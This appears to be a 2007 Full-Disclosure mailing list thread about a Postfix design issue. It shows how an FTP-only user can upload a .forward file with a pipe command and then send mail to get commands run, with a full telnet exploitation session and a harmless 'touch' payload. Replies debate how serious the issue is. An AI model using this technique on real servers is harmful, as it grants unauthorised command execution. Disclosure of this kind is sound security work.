No, the idea is that you are a user with no login access, only FTP. By doing this, you get shell access (with sane privileges, thankfully) when you're supposed to only have FTP.
On Dec 13, 2007 2:34 PM, Fredrick Diggle <[EMAIL PROTECTED]> wrote: > You have write perms on a users home directory and this was the best way > you could come up with to execute commands? Please send me details on your > recipe for boiled water. Be sure to gzip it though as I imagine it is > several pages long. > > YAY! > > > On Dec 13, 2007 2:18 PM, kcope <[EMAIL PROTECTED]> wrote: > > > Small Design Bug in Postfix - REMOTE > > > > There's a small issue on how Postfix forwards mails. > > A user can have a .forward file in her home directory. > > Inside this file she can specifiy an alternative recipient > > or use aliasing to execute commands when mail is received. > > >From the manpage ALIASES(5) > > "aliases - Postfix local alias database format" > > > > |command > > Mail is piped into command. Commands that contain > > special characters, such as whitespace, should be > > enclosed between double quotes. See local(8) for > > details of delivery to command. > > > > When the command fails, a limited amount of command > > output is mailed back to the sender. The file > > /usr/include/sysexits.h defines the expected exit > > status codes. For example, use "|exit 67" to simu- > > late a "user unknown" error, and "|exit 0" to > > implement an expensive black hole. > > > > This is fine since postfix properly drops privileges before > > executing the command. > > The Problem with executing commands via .forward files is that > > if someone manages to place a file into ones home directory and > > just sends a file to the mailserver she can execute commands > > even when she's not supposed to or does not have the privileges. > > > > Here is an example exploitation session, the user 'rootkey' > > only has ftp access with write permissions and no other privileges than > > that. > > > > Login to FTP server > > >telnet box 21 > > >USER rootkey > > >PASS rootkey123 > > <logged in > > > > Put .forward file with following contents into the home directory of > > user 'rootkey'. > > > > ---snip--- > > |touch /tmp/XXX > > ---snip--- > > > > >put .forward > > > > Now send an email to user rootkey. > > > > >telnet box 25 > > >mail from: rootkey > > >rcpt to: rootkey > > >data > > >. > > > > RESULT: > > > > [EMAIL PROTECTED]:~$ ls /tmp/testXXX > > /tmp/testXXX > > > > > > signed, > > > > - -kcope/2007 > > > > -- > > GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS. > > Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
